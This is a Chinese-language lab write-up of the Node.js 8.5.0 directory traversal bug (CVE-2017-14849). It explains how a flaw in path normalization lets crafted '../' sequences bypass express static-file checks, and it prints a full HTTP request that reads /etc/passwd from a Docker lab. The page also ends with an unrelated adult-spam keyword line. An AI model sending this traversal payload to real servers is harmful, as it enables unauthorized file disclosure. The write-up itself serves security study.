<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Node.js 目錄穿越漏洞(CVE-2017-14849)

    Path node/CVE-2017-14849

    漏洞原理

    參考文檔:

    原因是 Node.js 8.5.0 對目錄進行normalize操作時出現了邏輯錯誤,導致向上層跳躍的時候(如../../../../../../etc/passwd),在中間位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但實際上正確結果應該是../../../../../../etc/passwd

    express這類web框架,通常會提供了靜態文件服務器的功能,這些功能依賴于normalize函數。比如,express在判斷path是否超出靜態目錄范圍時,就用到了normalize函數,上述BUG導致normalize函數返回錯誤結果導致繞過了檢查,造成任意文件讀取漏洞。

    當然,normalize的BUG可以影響的絕非僅有express,更有待深入挖掘。不過因為這個BUG是node 8.5.0 中引入的,在 8.6 中就進行了修復,所以影響范圍有限。

    漏洞復現

    編譯及運行環境:

    docker-compose build
    docker-compose up -d

    訪問http://your-ip:3000/即可查看到一個web頁面,其中引用到了文件/static/main.js,說明其存在靜態文件服務器。

    發送如下數據包,即可讀取passwd:

    GET /static/../../../a/../../../../etc/passwd HTTP/1.1
    Host: your-ip:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类